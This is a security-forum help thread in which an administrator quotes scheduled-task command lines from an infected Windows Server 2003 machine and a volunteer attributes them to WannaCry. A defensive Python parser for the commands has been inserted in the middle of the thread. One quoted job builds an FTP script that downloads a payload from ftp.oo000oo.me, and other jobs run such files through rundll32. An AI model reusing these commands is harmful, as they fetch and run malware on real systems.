
Mysa1.job, Mysa2.job, and ok.job show up every morning in 2003 Server


  • This topic is locked
3 replies to this topic

#1 IT_Architect

IT_Architect

  • Members
  • 2 posts

Posted 04 July 2017 - 10:50 AM

Scans come up clean on Trend Micro and MalwareBytes, but Mysa1.job, Mysa2.job, and ok.job show up every morning in a 2003 Server and none of the others. If I delete the jobs, they will be back the following morning. They all say run at startup.
Mysa1.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2.job - cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p

ok.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

I know these are old OSes but they are tied to software.  I can shut off their Internet access if necessary.

Does anyone know what these are?

PS: I see in quarantine backdoor.forshare, which was taken out earlier as c:\Windows\Debug\item.dat

That's a problem.  Anyone know if this is fixable?


Edited by IT_Architect, 04 July 2017 - 11:07 AM.
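
The three job command lines quoted in the post above can be read mechanically. The following is an added example, not part of the original post or written by any participant in this thread: it rebuilds the script that the Mysa2.job echo chain writes for `ftp -s:` and links the downloaded file to the rundll32 jobs. The function names are hypothetical and the only input is the command lines as posted.

```python
import re

# Job command lines exactly as quoted in the post above.
JOBS = {
    "Mysa1.job": r"C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa",
    "Mysa2.job": r"cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p"
                 r"&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p",
    "ok.job": r"C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa",
}
ECHO = re.compile(r"echo\s+(.*?)\s*>>?\s*([^\s&>]+)", re.I)
FTP_S = re.compile(r"\bftp(?:\.exe)?\s+[^&]*-s:([^\s&]+)", re.I)
RUNDLL = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^,"]+)"?,\s*(\S+)', re.I)

def ftp_script(cmd):
    """Rebuild the file an echo chain writes before 'ftp -s:<file>' replays it."""
    m = FTP_S.search(cmd)
    if not m:
        return []
    script = m.group(1).lower()
    return [text for text, out in ECHO.findall(cmd) if out.lower() == script]

def ftp_download(script):
    """Return (host, remote_name, local_path) for the first 'get', else None."""
    host = next((l.split()[1] for l in script if l.lower().startswith("open ")), None)
    for line in script:
        parts = line.split()
        if len(parts) == 3 and parts[0].lower() == "get":
            return host, parts[1], parts[2].lower()
    return None

def rundll_target(cmd):
    """Return (file, export) when the command runs rundll32, else None."""
    m = RUNDLL.search(cmd)
    return (m.group(1).strip().lower(), m.group(2)) if m else None

def triage(jobs):
    """Flag rundll32 jobs loading a non-.dll file; note which job fetched it."""
    fetched = {}
    for name, cmd in jobs.items():
        dl = ftp_download(ftp_script(cmd))
        if dl:
            fetched[dl[2]] = (name, dl[0], dl[1])
    return [{"job": name, "loads": t[0], "export": t[1], "fetched_by": fetched.get(t[0])}
            for name, cmd in jobs.items()
            if (t := rundll_target(cmd)) and not t[0].endswith(".dll")]

if __name__ == "__main__":
    for finding in triage(JOBS):
        print(finding)
```

On the posted data this flags Mysa1.job and ok.job, and ties the item.dat loaded by Mysa1.job to the download performed by Mysa2.job; none of the three jobs accounts for how ok.dat arrived.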




#2 JSntgRvr

JSntgRvr

    Master Surgeon General


  • Malware Response Team
  • 11,679 posts
  • Gender:Male
  • Location:Puerto Rico

Posted 04 July 2017 - 08:09 PM

That seems to be part of Ransomware Wannacry.

 

Please follow the instructions here and post the required reports.


No request for help throughout private messaging will be attended.

If I have helped you, consider making a donation to help me continue the fight against Malware!


#3 JSntgRvr


Posted 09 July 2017 - 08:14 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.



#4 JSntgRvr


Posted 18 August 2017 - 01:32 PM

Posted in error.

Edited by JSntgRvr, 18 August 2017 - 04:42 PM.





